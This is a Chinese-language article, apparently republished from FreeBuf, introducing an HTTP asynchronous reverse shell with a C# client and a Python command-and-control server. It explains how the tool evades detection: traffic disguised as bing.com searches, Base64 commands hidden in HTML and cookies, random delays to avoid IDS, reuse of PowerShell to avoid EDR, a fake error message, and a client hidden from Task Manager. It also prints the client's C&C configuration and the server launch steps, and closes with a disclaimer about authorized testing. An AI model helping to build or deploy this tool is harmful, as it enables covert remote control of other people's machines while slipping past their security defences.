Http-Asynchronous-Reverse-Shell:一款基于HTTP协议的异步反向Shell
目前,我们有很多种方法可以创建一个反向Shell,并尝试绕过防火墙以成功控制远程设备。但实际上,传出的连接并不一定都会被过滤。
然而随着技术的发展,安全软件和硬件(入侵防御系统IPS、入侵检测系统IDS、代理、反病毒产品和EDR等)也变得越来越强壮,它们有能力去检测到这些攻击行为。而大多数情况下,与反向Shell的连接都是通过TCP或UDP隧道建立的。
因此,我们需要隐藏这些通信信道,而最好的方法就是将它们伪装成合法连接。标准用户使用最多的就是HTTP协议了,而且这种类型的流量几乎不会被过滤掉,以避免影响用户的网站浏览和访问。
工作机制
1、客户端App首先需要在目标设备上执行; 2、客户端与服务器建立初始连接; 3、服务器接受连接建立请求;
接下来:
客户端接收到指令之后,会向服务器发送查询请求;
攻击者提供指令给服务器端;
当命令被定义后,客户端将会执行该命令,并返回执行结果;
然后不断执行上述流程,直到攻击者结束会话连接为止。
功能介绍
该工具的当前版本实现了以下几种功能:
1、将HTTP流量伪造成bing.com的搜索流量; 2、命令会以Base64编码在HTML响应中; 3、命令执行结果会以Base64编码在客户端cookie中; 4、[可选]SSL支持,默认使用伪造的bing.com证书; 5、在每一个客户端调用请求之间设置随机延迟,以避免触发IDS; 6、服务器的每一个响应都使用了随机模板; 7、复用相同的PowerShell进程以避免触发EDR; 8、支持所有的CMD以及PowerShell命令; 9、[可选]客户端可以在启动时显示伪造的错误信息; 10、客户端在任务管理器中不可见; 11、[可选]客户端能以管理员身份运行;
反病毒产品检测
我们使用了69款反病毒产品来对我们的客户端来进行检测,其中只有三个会将其检测为恶意程序,而且还是在没有使用任何AV规避或混淆技术的情况下。
工具配置
客户端:C Sharp
1、在Visual Studio中打开HARS.sln文件。
Config.cs
这个文件中包含了工具的运行参数,我们需要根据具体情况来配置每个参数的值:
class Config
{
/* Behavior */
// Display a fake error msg at startup
public static bool DisplayErrorMsg = true;
// Title of fake error msg
public static string ErrorMsgTitle = “This application could not be started.”;
// Description of fake error msg
public static string ErrorMsgDesc = “Unhandled exception has occured in your application. \r\r Object {0} is not valid.”;
// Min delay between the client calls
public static int MinDelay = 2;
// Max delay between the client calls
public static int MaxDelay = 5;
// Fake uri requested – Warning : it must begin with “search” (or need a change on server side)
public static string Url = “search?q=search+something&qs=n&form=QBRE&cvid=”;
/* Listener */
// Hostname/IP of C&C server
public static string Server = ” https://127.0.0.1 “;
// Listening port of C&C server
public static string Port = “443”;
// Allow self-signed or “unsecure” certificates – Warning : often needed in corporate environment using proxy
public static bool AllowInsecureCertificate = true;
}
HARS.manifest
按照下列命令修改相应参数,工具将默认以特殊权限运行:
项目属性
在下面这个界面中,你可以自定义配置编译信息以及文件图标:
注意:目标.NET框架版本设置为了v4.6,Windows 10默认自带了这个版本的框架。如果是Windows 7,你可以选择.NET v3.5。
代码构建
你需要在Visual Studio中构建项目源码,生成的客户端程序将存储在Http Asynchronous Reverse Shell\HARS_Client\HARS\bin\Release目录下。
服务器端:Python
HARS_Server.py文件位于Http Asynchronous Reverse Shell\HARS_Server\www目录下。如果你需要修改端口或证书位置,可以直接修改配置文件中的相应参数:
# Config PORT = 443 CERT_FILE = '../server.pem'
工具运行
python HARS_Server.py
其他配置
1、HTTP日志文件存储在Http Asynchronous Reverse Shell\HARS_Server\logs目录下。 2、你可以在Http Asynchronous Reverse Shell\HARS_Server\templates目录下添加你自己的模板(任意HTML页面文件)。
工具演示
客户端
服务器端
声明
此工具仅用作授权安全测试的概念验证演示工具,请不要将其用于恶意目的。
项目地址
Http-Asynchronous-Reverse-Shell:【 GitHub传送门 】
* 参考来源: onSec-fr ,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM